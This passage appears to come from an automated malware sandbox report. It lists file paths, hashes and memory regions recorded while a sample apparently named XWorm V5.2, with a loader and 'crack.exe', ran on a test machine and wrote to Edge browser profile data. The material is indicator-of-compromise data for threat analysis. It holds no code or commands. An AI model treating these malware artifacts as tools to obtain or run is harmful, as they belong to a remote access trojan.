| SHA512 | 69d331acdf2654a609984ad7581acc8837bbc59179fc18a0b5e7383962c6fb3191b361e538cd9695435572852a00d42bebf5bc05a1197ad16f16d16d5c381984 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 0ba15f72ffb0a37243558588d3e78221 |
| SHA1 | 814bdfffd723f7de9f8d6d6a0bc8d85a9f275cc0 |
| SHA256 | 3d0223e1f8bb35870db41872cfbbe467f65bf9a1208dcb4d4ad874e250ccc10a |
| SHA512 | 02b168ef9cc226a08955092173c3745a55b28faa438b8152acb90d3bc1d9f433de7d8341def8b452db1986392a59cabc7c69689ad00825c58371ca78021183be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 73676b2a93a06937b9b5c9ddbfb29648 |
| SHA1 | 10b05c21f67d5551c324986f6cb5ef284f051198 |
| SHA256 | dee6753d9414897ab578ea448a178e67c0836f133207f9293e0afbcc3acbcc55 |
| SHA512 | 4b2e7907d3a9408413834bb1e571fa482deba5426ccdd9893c3dc2faa44806168f6a295034beb466c5416e94a0286d138bf816fdd0ce43a61e93bbd2cd1e5775 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 807419ca9a4734feaf8d8563a003b048 |
| SHA1 | a723c7d60a65886ffa068711f1e900ccc85922a6 |
| SHA256 | aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631 |
| SHA512 | f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ffd9cf436f5cca06c9950edad4e47e9e |
| SHA1 | 13a14deb5fbace9d38ac765b4ca05648d2cb97c0 |
| SHA256 | b5691d1a9d06ce2c3f07a2dd99761255024722b27264a3edd8bbcecebb643794 |
| SHA512 | 06a2986a36d590ad4e9f23ee4c380eaad9555526761f82330610ce8b40b8043a6fac7ceb75ce89de760526736ddf17f484c39b2005210aa43035ac96963ad7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 73b19544e51e676a4e9667458c435954 |
| SHA1 | aab5eb48831307fa78bd6058be3581eb8cafbb0d |
| SHA256 | 01b33f9547b96c3ce01813b0d485fd623debda39d333ced953eadf2d18b5b1b1 |
| SHA512 | 08c2fbce9e62b82853448419e5c689a9a74c9fc5787912a4052175a1b31b8014fe38b2861872b8480a82621478d90921e67b2e8692a014bdd93ca1adf2df34b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5cc6a3cd353aa67d5b89593090384fac |
| SHA1 | 61b4f36e39d0c830f24c1269ef59ca8f28c53ee7 |
| SHA256 | 1655f7e3c3c87877bda3c6af8842f3bdd635e38a160db2ba7650d65045bab5ee |
| SHA512 | 30e9b94123db7dee0409824c3a4f343b4c485fa5153ac6501a65424eef3b11ad80f0f1ae555998736f928721d34d9fda502522e8e5271ede602f89ba9371ccfc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582313.TMP
| MD5 | a6b95e4b5c7e940d10e2af1b24e5eaf6 |
| SHA1 | 7c2601156472ca168ecfcf2a9ab9f8d8c7c29afa |
| SHA256 | cb6ce870cd51e1c04bd848e49f66d4b1b0ba1acdb7af284bee9c01ac48678576 |
| SHA512 | aba36b3206aca36bbc7bb94d62e52e218548895922df11240161b6218a83d49fe6bc00be7e1d2537e253f95c4653aeeae2144b0edb5e19e07c030d777f96080d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9807f0e421e000dbd2345de8baff2e53 |
| SHA1 | 36c2c598fdf1f05d446b6ac909a4d7bbdd472c3e |
| SHA256 | b6b8c79321f9b9800bb94ebf73e1ec6c9ea6a80d2a773bffba5561d5f94abecf |
| SHA512 | d82a83a3f35bab609334cd9b2d2ea86bf5c2ae35908fe022ef5bbdfd1451e270daa6e690f6bf32091bd5b86340b7166801891340490f12e3000f0f0699049b70 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4988880689f84366ff4e0b9edc03fd18 |
| SHA1 | b822dac83c8c14d29feab876922415424049d81f |
| SHA256 | aeeca7d1f22d39d9e03c243afe2fceeab1170ee3e41b8777eb47d71512181e6b |
| SHA512 | d7ce5c4e839e21797c68ae41fdbbb26bd66ea0e9af43d79ef0d63ace2ecc9cd930e5bf8fbb54be7d8f435a6393ab8afa2601a7cb6dce30fd922aa9a626615fb5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4fa38d3b88926c50a6092cbeb1e53035 |
| SHA1 | 811900630012443c74e1a7a11dbf57d7960f7f77 |
| SHA256 | 724274d9cdeacd2bced30fc10c64c14a45dde01950445c65bcca94ab45bf4a82 |
| SHA512 | 279c7e80e702238b1e767371d6198e9904c6477de3c7424661d0f2818d447a5cef474ecc0a263187b3185b1aeb63646cbe3532da7866a99388d9db0d5eb1b178 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9e2581ea1da6453c309b44d07b5eb17b |
| SHA1 | e5f4528dc97ea3c7e862a21b19a5b982d41360eb |
| SHA256 | 6af625209060c3785e2c7ff0a20f9c90e86c647b049d53d24f1a82e51de77c08 |
| SHA512 | af24756049a24fdc77590c874ba4b0d4d1ec9b3f8cbb84886a88b0aafa53909941f4fa4d429a98d0116ed5ccdaae22be769a0c375733362d8e4b99f021ce5255 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c719706347c3786b887eba40d0a61b9b |
| SHA1 | d75eb62981848e218ebe4876421d80fcb913ac4e |
| SHA256 | 6ec8e5d7b659658bca6d5e51e1fd89da292f0ebf46c3d0a3fb30068daa0cfe69 |
| SHA512 | 0c8b2308febb5f178206861fb3ce319f4d37e077f87e3106e70fba200dfe92a62293c9ab8efc182349fee14c3bf02e6419c1c9b68d1e37c569132b8470186f51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a8b08dbac855021ae6e59b8146ca4301 |
| SHA1 | 2217d69889d1227210bf0a12aa130a052f07e93c |
| SHA256 | 7cb303a33f124ce25211a9ff470e5ecb1ea74f67aaf49537fe734cfe773b5904 |
| SHA512 | b02a26a1f512e0c0c19963e7b218f9d91d2d21c4d6443e2832f5f4b1f31982f898c407792045c0da2753fb8cdf49c2fc93dc40ff79bf11e14e715ac098928cee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | df3b47b05cbc7adefce037c97655ee37 |
| SHA1 | 932c6ac1482f1ac42df10f22c063726a5351a06b |
| SHA256 | 64bd11ff923f2712eae43d2919d9e9ea43896ede24461e33fe177a59fdca5d48 |
| SHA512 | ca45a4efe2c83dd0f8a0afd30ae80f6f79d907c37990b0137813aa34abd855f75b4876cd2e1dd577cbc27cd2c6b1928967182981aab11a718492f8b4e8901f1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 9b5721a416afbe60d8a3b91d7c0453b6 |
| SHA1 | c57cc1e101965449586c6208fd11044122684e87 |
| SHA256 | 568088293995d374552fb283f6867145ab4441d77be2dc321f3f77525992e9fe |
| SHA512 | 75516fc1887b6c6504d2715907fcddb944a454f53c82955113306aa1926f5556b9baf3437455327dfc15bb3695e956393c5780355587e80b3ba3ed1c2fb9161f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bfef895e9a3c4cc8dddf5506add79b70 |
| SHA1 | 89b64158b3e33a76df584107cf9f2e27488df50b |
| SHA256 | b6ce287ae2e8ea988d44fbc9f962150eadb15dac468348a93fe1058d74328702 |
| SHA512 | c19e166edbce169c2eeec28fab0581e86c8edf22d8d29e82c83cb93d0b5240f2424e25963ef78e8cf4ddb4d37b234554e134c6830e9332c7392fe9e1c0f6664b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 49a5571fe1ad61758809ac8905685074 |
| SHA1 | 9c4805afe576973c27c0538b04f35b3899c99146 |
| SHA256 | 0765e481acc5255856104976c8cbd7dbad065daa2384eec1cc175b37d9bdbea7 |
| SHA512 | e0f89fbba5e61cd4561026f9297319df4a6f9187586de923c9675afb8d3d90015374ae80137f3dfbd6a0d93f4322bd3222cb4ca122671fb740d912a91090a434 |
C:\Users\Admin\Downloads\XWorm.V5.2.rar:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f5055925cb347ddccb0a337b5ac843df |
| SHA1 | f9f876c5206a87f3c86f90e7d45574606df6f7a6 |
| SHA256 | bd187cad951a03d04ca89f093353a12b2f27a139ec6a1938bbd75f98cf93c8ba |
| SHA512 | ccc062617d08cf1cf88d1978325318e55a279de533c14f770b27fd116ed2aa5d0c0bbd5c2d2578f64919c83a617bf978c2fa8f602e98120f0139f1b0a1b4ab80 |
C:\Users\Admin\Downloads\XWorm.V5.2.rar
| MD5 | 2a16b9474dd55ed48f1602c4a17a3b60 |
| SHA1 | f279b4a379e4c30e134ccb6a2837dbceecce9d13 |
| SHA256 | 6a4beba8dda5d6d9b9f301c6bcf100b05d8c192453ee7d293efbe95f9a0f76c9 |
| SHA512 | b2ceeeb17f77c589068259ba07c2c1ccef420af17398f26b6bb92729771c6fb67bcbb2a139243c77dbdfc9dcddcc3e71a805b1645d70afcbbc08b27c7c0881e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 38067300714300e77e95a985359b351f |
| SHA1 | d8311f16f739b7f7cbc8b49239fb395b97a201e9 |
| SHA256 | d5317b3b8f8f6c764c0179cf6eb7a5e43599c43587a4514582fd9160212c0fb2 |
| SHA512 | e880d777625153b7c5fca775cb5c9a07e411d9265e2579082b66bba553af5aec5df813c9be1a4d3a174aeb908ad0e8bee5d79077d3a1104026542a0e53160848 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dd53ac41d94ff3b0cfd7b3a6c953bcae |
| SHA1 | 90c9bbf2129d1add447efd825207100925482f04 |
| SHA256 | 8f338ff57bd11e5e6576e5daa44284a56c779027042bfb69c4390d6e14f30314 |
| SHA512 | 89dce6971bad39f4908506f033afa9e1ce94ebd81efb6ba1da53cc8c40f993d22317f2b691f692fa1e594f9b9570f67f782da85f65ffcc855ee597299cccedb1 |
C:\Users\Admin\AppData\Local\Temp\7zO04CF9089\XWormLoader 5.1 x64.exe
| MD5 | dfad6480336587ed4ca5f713db8e5bc5 |
| SHA1 | 61e57a8e6ccb6e46623f51726c1f5851724c4a58 |
| SHA256 | 02f4c1fef324c120432c4d54cd97d4aef3eddc2c426b03f9990cdeef37bdf6c9 |
| SHA512 | 6f19ea16ec970529a4b38edbac13e5229580fe29303a8b3e3b7646637f44d73434fdfb029eee33e26fbbfb91489cf7156cc1ec12c3658ddeacad340235121a85 |
C:\Users\Admin\AppData\Local\Temp\7zO04CF9089\XWormLoader 5.1 x64.exe:Zone.Identifier
| MD5 | 18695cc58b74fe73d7147e8e278ed35b |
| SHA1 | 6d6ae2a346c6acc98b8c98f4aac289c0281af46b |
| SHA256 | b9f5386d0064e13682bce391827d90c911dbfd253a143925eb3ef72b7e435fc0 |
| SHA512 | 4f3693778f1db663ade721a58a7c2fe949f228d785b6a5ce382cc9c6798b2ce837a225257bf73ba2534bb72390664745cd07ed48bb0a2a9e5b6c142b7f755874 |
C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe
| MD5 | 8b7b015c1ea809f5c6ade7269bdc5610 |
| SHA1 | c67d5d83ca18731d17f79529cfdb3d3dcad36b96 |
| SHA256 | 7fc9c7002b65bc1b33f72e019ed1e82008cc7b8e5b8eaf73fc41a3e6a246980e |
| SHA512 | e652913f73326f9d8461ac2a631e1e413719df28c7938b38949c005fda501d9e159554c3e17a0d5826d279bb81efdef394f7fb6ff7289cf296c19e92fd924180 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | dc7c40e556b30acdb1ca3e96bd31e1e8 |
| SHA1 | d55685a0c7be37a2770c960af43254580467573d |
| SHA256 | 1ca3f8c46710f2f696ae1fa7c2f47920d9cb6465a23f3ac7296c0c819ded24dd |
| SHA512 | 639a408b29def2e971f68839749efdfe62fb4b11642db4c0759322ebe97891cfc1d944fc01e1e1e5769fbe43d5e75c87623910d2660af40e942b1d489f0fb7cf |
memory/4168-690-0x000001EFEEEE0000-0x000001EFEFB18000-memory.dmp
memory/4168-691-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll
| MD5 | 2f1a50031dcf5c87d92e8b2491fdcea6 |
| SHA1 | 71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f |
| SHA256 | 47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed |
| SHA512 | 1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8 |
memory/4168-699-0x000001EFF3010000-0x000001EFF3020000-memory.dmp
memory/4168-700-0x000001EFF3020000-0x000001EFF3C0C000-memory.dmp
memory/4168-701-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
| MD5 | 3facc93eb70a073f208f90955fb055cb |
| SHA1 | 8f04cf5b9c9164f82b7e77034eee62396f6c5bf0 |
| SHA256 | 608c73065d03ab7da0a0b8c8c3db3e073b2403a8d0249b9d684286f58e52dead |
| SHA512 | 269fb263dd7a2f383c2442a43e98435c4ee0767eab55c77ce5ff2e169089739e746f70208baaac2e4459076596a6afbf3fc8960d1ce9b8f46e91f7e462bd649c |
C:\Users\Admin\AppData\Local\Temp\NEW.EXE
| MD5 | e2b473487e4b8429711aef51a68f56a4 |
| SHA1 | 7d3119b07b951c68d17ae12e0764072a8c3d961b |
| SHA256 | c2ced27749e5bf8d9d01de0feb58ab40818c3f4339dd9c5898b2b6168be2ce44 |
| SHA512 | ead5c2977428cd44eb98f48511dbce8e64f5544fc3f8cc3e706f24f5903eeca92207a07c18f089e4451f8ed5264c28b6e1e088437100cc6c7274432275d18dd1 |
memory/2992-743-0x0000000000450000-0x0000000000458000-memory.dmp
memory/2952-742-0x0000000000EB0000-0x0000000000EC6000-memory.dmp
memory/2952-744-0x0000000074B90000-0x0000000075341000-memory.dmp
memory/2992-746-0x0000000074B90000-0x0000000075341000-memory.dmp
memory/2952-747-0x0000000005930000-0x0000000005940000-memory.dmp
memory/2952-748-0x0000000005940000-0x00000000059DC000-memory.dmp
memory/2952-754-0x0000000074B90000-0x0000000075341000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4C0E.tmp.bat
| MD5 | 5878b0128d7a339aed2d629762a05718 |
| SHA1 | e1d606091a8af2ae55f392f1eafe07e85183ac7e |
| SHA256 | 83b44dff6ff54fff2f43ab3eb814f8dca2723af638c85c77c553a9cc5e2af040 |
| SHA512 | 9add89dab52e2b570a715d79e59f308196394ed472f757c2efa125a87350a59d47708d6624c89d4cec8b6e77ca031809bbd957701ed56afa0df5f43cdb609d3d |
C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe
| MD5 | e6a20535b636d6402164a8e2d871ef6d |
| SHA1 | 981cb1fd9361ca58f8985104e00132d1836a8736 |
| SHA256 | b461c985b53de4f6921d83925b3c2a62de3bbc5b8f9c02eecd27926f0197fae2 |
| SHA512 | 35856a0268ed9d17b1570d5392833ed168c8515d73fac9f150cf63cc1aea61c096aa2e6b3c8e091a1058ba062f9333f6767e323a37dfb6f4fa7e508a2a138a30 |
memory/5116-776-0x0000000000030000-0x0000000000050000-memory.dmp
memory/5116-777-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
memory/4104-781-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/5116-782-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
memory/4104-783-0x0000000002E30000-0x0000000002E40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ConsoleApp1.exe.log
| MD5 | 1294de804ea5400409324a82fdc7ec59 |
| SHA1 | 9a39506bc6cadf99c1f2129265b610c69d1518f7 |
| SHA256 | 494398ec6108c68573c366c96aae23d35e7f9bdbb440a4aab96e86fcad5871d0 |
| SHA512 | 033905cc5b4d0c0ffab2138da47e3223765146fa751c9f84b199284b653a04874c32a23aae577d2e06ce6c6b34fec62331b5fc928e3baf68dc53263ecdfa10c1 |
memory/2420-806-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/2420-807-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/2992-808-0x0000000074B90000-0x0000000075341000-memory.dmp
memory/3820-832-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/3820-833-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/4104-834-0x0000000075230000-0x00000000759E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6501760878eab949512641f92edce0a3 |
| SHA1 | 3a1c324d8fea7ebeece5803e9ac36a80d4f37976 |
| SHA256 | fedb3da8eed8530af16948231af63e90c0f06ee6e48f20ebca269758e6f3d682 |
| SHA512 | e734921dc9abff2c8343ef80407f56c8b80b91ce4f3723529e795350d80b3e0ca185b2dd21f57feaf8e0722fae6a5ec30888b7add80305871beb662c0f4ce11a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0edbeeefdcb21bd1a62e46d06e648ea2 |
| SHA1 | 66483e1aee5b0da7712ddc0becb913010da93862 |
| SHA256 | c50d4742f7b3597255b30710e481c8928fea8e1a147d0cf09f05e4c388258137 |
| SHA512 | 194aef0812759c83e8bad4c0affdb9e01fadc796315511b698df1b029aa4596a55353592078a26f7b5e2c592b03ddb5f63fddebf280a4ee1f13ffd458d401f9a |
memory/4104-856-0x0000000002E30000-0x0000000002E40000-memory.dmp
memory/4104-869-0x0000000006230000-0x00000000067D6000-memory.dmp
memory/4104-870-0x0000000005D30000-0x0000000005D96000-memory.dmp
memory/4972-880-0x00007FFBE0AE0000-0x00007FFBE15A2000-memory.dmp
memory/4972-883-0x00000226004E0000-0x00000226004F0000-memory.dmp
memory/4972-884-0x00007FFBE0AE0000-0x00007FFBE15A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | d2d55f8057f8b03c94a81f3839b348b9 |
| SHA1 | 37c399584539734ff679e3c66309498c8b2dd4d9 |
| SHA256 | 6e273f3491917d37f4dbb6c3f4d3f862cada25c20a36b245ea7c6bd860fb400c |
| SHA512 | 7bcdbb9e8d005a532ec12485a9c4b777ddec4aee66333757cdae3f84811099a574e719d45eb4487072d0162fa4654349dd73705a8d1913834535b1a3e2247dc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 24f393ce9e4272995bf97f9c5994d826 |
| SHA1 | ba40a6c32e34cd16b3f5515be2cc6bc6d0f72e8f |
| SHA256 | ee1abc75c48f6614e30a34f942ffdfaf0a20182d8e0b380f10b57888cd0e7f54 |
| SHA512 | 7351f18c5ecdebab97a0bcbf75dc94aeb67c1cfbcf3382d518c25f63374de11374f422a215d07ae50c7c96f99c6cb8d82d421cd7d6c381e70773f068fe430eeb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | d6b36c7d4b06f140f860ddc91a4c659c |
| SHA1 | ccf16571637b8d3e4c9423688c5bd06167bfb9e9 |
| SHA256 | 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92 |
| SHA512 | 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 2e86a72f4e82614cd4842950d2e0a716 |
| SHA1 | d7b4ee0c9af735d098bff474632fc2c0113e0b9c |
| SHA256 | c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f |
| SHA512 | 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 56d57bc655526551f217536f19195495 |
| SHA1 | 28b430886d1220855a805d78dc5d6414aeee6995 |
| SHA256 | f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4 |
| SHA512 | 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | b38fbbd0b5c8e8b4452b33d6f85df7dc |
| SHA1 | 386ba241790252df01a6a028b3238de2f995a559 |
| SHA256 | b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd |
| SHA512 | 546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | d404b61450122b2ad393c3ece0597317 |
| SHA1 | d18809185baef8ec6bbbaca300a2fdb4b76a1f56 |
| SHA256 | 03551254e2231ecd9c7ee816b488ecbde5d899009cd9abbe44351d98fbf2f5fb |
| SHA512 | cb1a2867cc53733dc72cd294d1b549fa571a041d72de0fa4d7d9195bcac9f8245c2095e6a6f1ece0e55279fa26337cdcc82d4c269e1dd186cbbd2b974e2d6a70 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3ca9f1a5314df6fa1f0fc35cec299c5b |
| SHA1 | 6a506081c8c2c80fca360eadd2049d3c4f207e7a |
| SHA256 | a59fc2ce7b9904c79c06dcef5fe870237ee647f0ff23e987fae82596bc2e91f5 |
| SHA512 | 214853143bd8a4a356b9c4fc0ef612a306e2c58c7ab7d869423fb10350259c8773a733b2e19c91d006dd42440c593d25631282cdad126982c91f94e43f58ffc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ececd44456a852def7379d7da7adfa4d |
| SHA1 | f2bbf52ae65c8479d884e0a0af71709e4d351923 |
| SHA256 | e95be3be02389fbb8769cc551c83c0e8602a5e67ec1b6f87e3d8edda17a1626e |
| SHA512 | fd24d6735f212aad5bd59cab20e17533725481ae5b429736f0cbb71948b5462882967b62b4f651be4b64989116bbbb3edc82ba8451fea45b788b985ce4ca76d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | bc9faa8bb6aae687766b2db2e055a494 |
| SHA1 | 34b2395d1b6908afcd60f92cdd8e7153939191e4 |
| SHA256 | 4a725d21a3c98f0b9c5763b0a0796818d341579817af762448e1be522bc574ed |
| SHA512 | 621386935230595c3a00b9c53ea25daa78c2823d32085e22363dc438150f1cb6b3d50be5c58665886fac2286ae63bf1f62c8803cb38a0cac201c82ee2db975c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009
| MD5 | 3cd0f2f60ab620c7be0c2c3dbf2cda97 |
| SHA1 | 47fad82bfa9a32d578c0c84aed2840c55bd27bfb |
| SHA256 | 29a3b99e23b07099e1d2a3c0b4cff458a2eba2519f4654c26cf22d03f149e36b |
| SHA512 | ef6e3bbd7e03be8e514936bcb0b5a59b4cf4e677ad24d6d2dfca8c1ec95f134ae37f2042d8bf9a0e343b68bff98a0fd748503f35d5e9d42cdaa1dc283dec89fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5b606f5686a1733d5dcee5d8025f18ec |
| SHA1 | 618b2a442a7a717d6aa2aef905f317df55ad2c27 |
| SHA256 | cce615095a0572052cfc325888a03b4606f0bb40e18e82ec3c79540894473d52 |
| SHA512 | 2a307500d5de4a456c719a0407821195b5a2aa0496ad4cd70cb1adecaf1684c3a8e77000eff8e7d33408e8856885c44d9229f41ea1bbf82c67d0fccf55b15d4a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c78f3755f348b5560861886cade17b31 |
| SHA1 | 8b401ae3db9a3480ca7bfe7563865d297ed29ceb |
| SHA256 | 32bbe8890d2cfa5fa080297f655ca349d9013db5baf8c765df9de60d9d359d3c |
| SHA512 | 9be5048cb6dc0c6ed8392a9178f1fc158cfb7b14a05a1f750992eb2719e872ce6d91aa6c1c84a13cb81e887ec3f88ba317b82399d154ba720daddf0a5b13da99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | be215b18cd4c23bbbaaed7c9fbe28f66 |
| SHA1 | 67db5194c07f689c84b89491844e1b068b0169af |
| SHA256 | f1d3e49e17ba921084bb00ccc94b62e7b37a8caff10fe5146cbfc52eaf4de49d |
| SHA512 | e48286894763db19dd66c82571cadb6e969aad782bfbbdfb4f7d82592e4e519a29c8a3d8c12ef2d5c174289ae80f7764590b9186d80d511883ddee74dcfc9ecd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 61c5c04d9ce0d6c486522dfd597add4e |
| SHA1 | 53aaac3a3a78018e024df19d174496bfc21d74b4 |
| SHA256 | abbdf8c19949e36bdbdc60d0313a9228c55c07024c59b0d0b945230f8cc18523 |
| SHA512 | 496310e679f0a2bc02aff46a15768140a406cc2a3fbe43fc5b861b801cb2d46d21c919f373bf4256c2676a4df74ef071bd6d44da98f89f8e08fb0f811069c150 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a
| MD5 | e5cad16da39f161457a9b759164bbe5f |
| SHA1 | 476e108cbab28844ae21f904141b54e04dd62c1c |
| SHA256 | 95130d92d6a237bc8060ee7d65315087d37addababacee454bdd727a1530a5cc |
| SHA512 | 8d9c7f7f1c42a41f425d0de5eec5bab670e585f2b6c9cdda0586bcefc21f2773ff316179dfc37228b8bbcfab73dcdd30262da6f65b3aebf55bf233a51aabd1ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034
| MD5 | 81c4850d4dda1e98c746c1761d344d07 |
| SHA1 | cc853b7bf2573224a66132ff22f94ac6b1bfcfdc |
| SHA256 | 46e29bd51a4aebe032b0e9d80af09dd530d9fc826b2eb208540383e4f9f92fbc |
| SHA512 | ac543cc958703eb163dbbf7fe837d33e1514107a30a571d70f35f6d54d0aeaa94392c216674410771ba3e648156feb4e1fbf2f07f82cc1345d299d54a6483135 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003d
| MD5 | 13b3d52d076145adc5b00520ec4c94c4 |
| SHA1 | 8d3a1c82970560998e45e3d0853088e7a19faa35 |
| SHA256 | 2a5521f86dfc490430439c37bed6a352630837ea80d890adb1524e871dc7888b |
| SHA512 | 9cfc66452585027690b6f3a5e48ae7d294e5141b04099f1597e56e9e81e512bbc5edf7657d877e295ad77533dda156be0108fd7b08d6a0e6b6af85d5d02ea97a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a23154f906b9cb3b90e23f2aedc65b12 |
| SHA1 | 6efb7c160c42cd19e6a555861d9143777b2608f9 |
| SHA256 | a050d09646721522ee0f2c4359db255179b37729ce549f20b1b12615bd30597a |
| SHA512 | 6362d0ebeb21ad839c51be05bb52845a3ede4ebf4fafc619115bfbe7caab25fb4b13d22098b23268ecc3d66607f722608de9d40fb0ea085558818358cdde3a8b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 319b10bf35fefbbe8a6b15ad60de92f7 |
| SHA1 | 3b2c4a3575bfc9f61af6ef9a5e9d761f40a2164c |
